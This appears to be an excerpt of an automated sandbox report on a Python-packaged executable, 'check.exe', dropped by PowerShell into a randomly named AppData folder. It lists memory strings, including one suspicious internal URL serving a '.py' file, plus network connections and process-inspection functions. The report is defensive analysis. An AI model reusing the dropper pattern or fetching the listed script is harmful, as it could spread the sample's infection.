Source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/V
Source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp	String found in binary or memory: http://www.color.org)
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: check.exe, 00000005.00000002.2105400235.000001DB07E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: check.exe, 00000005.00000002.2103370262.000001DB077E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: check.exe, 00000005.00000002.2101666628.000001DB05A38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: check.exe, 00000005.00000002.2128958771.000001DB0862C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1836530909.000001DB075A7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1837728642.000001DB0759D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: check.exe, 00000005.00000003.1839009875.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840262827.000001DB07A20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1843045701.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840325932.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840368079.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839110774.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB07A1C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839088287.000001DB07A1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: powershell.exe, 00000000.00000002.2086234964.000001BBD04D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07D20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2128958771.000001DB08654000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: check.exe, 00000005.00000003.1840368079.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1833669467.000001DB07581000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105029843.000001DB07B00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: check.exe, 00000005.00000002.2128958771.000001DB085A0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844084262.000001DB07E1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311F00000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: check.exe, 00000005.00000002.2173500044.00007FFBA1344000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2183903299.00007FFBA98D0000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: check.exe, 00000005.00000002.2105400235.000001DB07EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD61E90 PyList_New,GetActiveProcessorCount,PyErr_SetFromWindowsErr,_Py_Dealloc,free,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,PyExc_RuntimeError,PyErr_SetString,malloc,PyErr_NoMemory,NtQuerySystemInformation,Py_BuildValue,PyList_Append,_Py_Dealloc,free,_Py_Dealloc,	16_2_00007FFB9DD61E90
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD62480 GetActiveProcessorCount,PyErr_SetFromWindowsErr,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,PyExc_RuntimeError,PyErr_SetString,malloc,PyErr_NoMemory,NtQuerySystemInformation,free,malloc,PyErr_NoMemory,NtQuerySystemInformation,malloc,PyErr_NoMemory,NtQuerySystemInformation,free,free,free,free,free,Py_BuildValue,	16_2_00007FFB9DD62480
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD67480 malloc,NtQuerySystemInformation,free,malloc,PyErr_NoMemory,free,free,	16_2_00007FFB9DD67480
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD66E80 PyExc_RuntimeError,PyErr_SetString,OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,CloseHandle,calloc,PyErr_NoMemory,CloseHandle,NtQueryInformationProcess,calloc,PyErr_NoMemory,free,CloseHandle,wcscpy_s,free,CloseHandle,	16_2_00007FFB9DD66E80
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD66290 GetProcessHeap,HeapAlloc,GetFileType,SetLastError,NtQueryObject,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,PyErr_NoMemory,GetProcessHeap,HeapFree,	16_2_00007FFB9DD66290
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD65760 PyArg_ParseTuple,OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,Py_BuildValue,	16_2_00007FFB9DD65760
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD64D40 PyArg_ParseTuple,OpenProcess,GetLastError,PyObject_IsTrue,NtSuspendProcess,NtResumeProcess,CloseHandle,_Py_NoneStruct,_Py_NoneStruct,	16_2_00007FFB9DD64D40
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD66640 PyList_New,EnterCriticalSection,GetProcessHeap,HeapAlloc,PyErr_NoMemory,_Py_Dealloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,PyExc_RuntimeError,PyErr_SetString,GetCurrentProcess,DuplicateHandle,PyUnicode_FromWideChar,PyList_Append,_Py_Dealloc,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,_Py_Dealloc,GetProcessHeap,HeapFree,LeaveCriticalSection,	16_2_00007FFB9DD66640
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD65850 PyArg_ParseTuple,OpenProcess,GetLastError,NtSetInformationProcess,CloseHandle,_Py_NoneStruct,_Py_NoneStruct,	16_2_00007FFB9DD65850
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD66AE0 OpenProcess,GetLastError,NtQueryInformationProcess,RtlNtStatusToDosErrorNoTeb,PyErr_SetFromWindowsErrWithFilename,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,ReadProcessMemory,NtQueryInformationProcess,CloseHandle,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,GetLastError,PyErr_SetFromWindowsErrWithFilename,CloseHandle,calloc,PyErr_NoMemory,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,free,CloseHandle,	16_2_00007FFB9DD66AE0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD646C0 PyArg_ParseTuple,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,Py_BuildValue,PyUnicode_FromWideChar,GetProcessHeap,HeapFree,PyErr_NoMemory,	16_2_00007FFB9DD646C0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD64AB0 PyArg_ParseTuple,OpenProcess,GetLastError,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,PyExc_RuntimeError,PyErr_SetString,CloseHandle,PyErr_Clear,GetProcessHeap,HeapFree,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,Py_BuildValue,PyErr_NoMemory,CloseHandle,	16_2_00007FFB9DD64AB0

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe

Code function: 16_2_00007FFB9DD62B00: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle,

16_2_00007FFB9DD62B00

Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E1000	4_2_00007FF61E8E1000
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E905C00	4_2_00007FF61E905C00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E89E0	4_2_00007FF61E8E89E0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E906964	4_2_00007FF61E906964
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8E9800	4_2_00007FF61E8E9800
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F1740	4_2_00007FF61E8F1740
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F1F60	4_2_00007FF61E8F1F60
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F8794	4_2_00007FF61E8F8794
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E9008C8	4_2_00007FF61E9008C8
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F80E4	4_2_00007FF61E8F80E4
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E901874	4_2_00007FF61E901874
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E9040AC	4_2_00007FF61E9040AC
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F1D54	4_2_00007FF61E8F1D54
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8FE570	4_2_00007FF61E8FE570
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F35A0	4_2_00007FF61E8F35A0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8FDEF0	4_2_00007FF61E8FDEF0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E909728	4_2_00007FF61E909728
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E905E7C	4_2_00007FF61E905E7C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F9EA0	4_2_00007FF61E8F9EA0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F2C10	4_2_00007FF61E8F2C10
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E903C10	4_2_00007FF61E903C10
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E9008C8	4_2_00007FF61E9008C8
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E906418	4_2_00007FF61E906418
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F1B50	4_2_00007FF61E8F1B50
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F5D30	4_2_00007FF61E8F5D30
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8EA474	4_2_00007FF61E8EA474
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8EACAD	4_2_00007FF61E8EACAD
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F1944	4_2_00007FF61E8F1944
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F2164	4_2_00007FF61E8F2164
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8F39A4	4_2_00007FF61E8F39A4
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8EA2DB	4_2_00007FF61E8EA2DB
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 4_2_00007FF61E8FDA5C	4_2_00007FF61E8FDA5C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD61E90	16_2_00007FFB9DD61E90
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD62E70	16_2_00007FFB9DD62E70
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD63970	16_2_00007FFB9DD63970
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe	Code function: 16_2_00007FFB9DD66640	16_2_00007FFB9DD66640
